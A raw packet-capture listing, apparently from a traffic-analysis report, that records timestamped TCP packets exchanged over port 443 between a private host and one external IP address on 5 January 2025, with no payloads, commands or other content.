                                                                                                                                                                                              Jan 5, 2025 18:08:37.429599047 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.432127953 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.516134977 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.516170979 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.516386986 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.516419888 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.516524076 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517153978 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517175913 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517220974 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517226934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517277002 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517462969 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517478943 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517520905 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517530918 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517582893 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517708063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517725945 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517760992 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517769098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517781973 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517787933 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517813921 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517818928 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.517841101 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518023968 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518054962 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518074989 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518081903 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518120050 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518233061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518248081 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518291950 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518299103 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518340111 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518393040 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518435001 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518650055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518668890 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518709898 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.518716097 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.521533966 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604650974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604675055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604890108 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604897976 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604922056 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604938984 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604945898 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604960918 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.604974031 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.605011940 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.606575012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.606595993 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.606647968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.606653929 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.606690884 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607017994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607034922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607096910 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607104063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607153893 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607732058 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607748032 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607826948 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607832909 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.607870102 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608001947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608016968 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608050108 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608056068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608073950 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608092070 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608207941 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608231068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608256102 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608261108 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608285904 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608304024 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608584881 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608607054 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608659029 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608664989 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.608705997 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.609667063 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693413973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693430901 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693494081 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693501949 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693532944 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693666935 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693686962 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693708897 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693713903 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693737030 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.693752050 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695255995 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695270061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695323944 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695328951 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695369959 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695811033 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695823908 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695890903 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695895910 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.695939064 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696454048 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696471930 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696500063 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696506977 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696533918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696568966 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696780920 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696800947 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696825981 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696835041 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696855068 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696876049 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696960926 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.696979046 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697004080 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697009087 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697040081 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697055101 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697237968 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697254896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697376013 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697381973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.697423935 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.698163033 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782215118 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782250881 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782304049 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782325983 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782339096 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782366037 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782412052 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782438993 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782473087 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782480001 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782500029 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.782519102 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784121037 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784136057 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784213066 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784220934 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784282923 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784512043 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784528017 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784571886 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784578085 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.784617901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785291910 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785309076 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785358906 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785365105 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785406113 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785518885 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785541058 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785572052 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785578012 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785600901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785609961 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785789967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785804987 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785836935 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785842896 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785866022 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.785872936 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786079884 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786098957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786133051 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786139011 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786161900 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786176920 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.786787033 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871040106 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871062994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871134996 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871172905 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871257067 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871257067 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871257067 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.871279001 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.872967005 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.872983932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873040915 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873051882 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873265982 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873296976 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873320103 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873326063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873352051 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873368025 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873956919 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.873975039 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874027014 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874032974 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874063015 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874249935 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874264956 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874304056 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874310017 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874346972 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874479055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874495029 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874533892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874540091 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874572992 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874861956 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874877930 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874926090 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874931097 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.874964952 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.876401901 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959769011 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959790945 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959877968 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959893942 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959909916 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959929943 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959940910 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.959945917 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.960016966 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961551905 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961569071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961627960 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961633921 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961673975 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961985111 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.961999893 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962044954 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962052107 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962068081 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962090015 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962820053 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962835073 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962888002 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962893009 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962930918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.962985039 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963000059 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963041067 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963046074 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963085890 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963278055 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963293076 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963323116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963329077 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963357925 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963376045 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963534117 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963548899 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963584900 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963589907 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963617086 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.963637114 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:37.964539051 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048597097 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048624992 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048706055 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048722982 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048752069 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048765898 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048774004 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048788071 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048800945 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.048835993 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050381899 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050395966 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050446987 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050452948 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050479889 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050487041 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050808907 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050822973 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050867081 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050873995 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.050915003 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051645994 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051660061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051707983 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051716089 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051743984 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051743984 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051873922 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:38.051887989 CET44349758172.67.208.58192.168.2.4
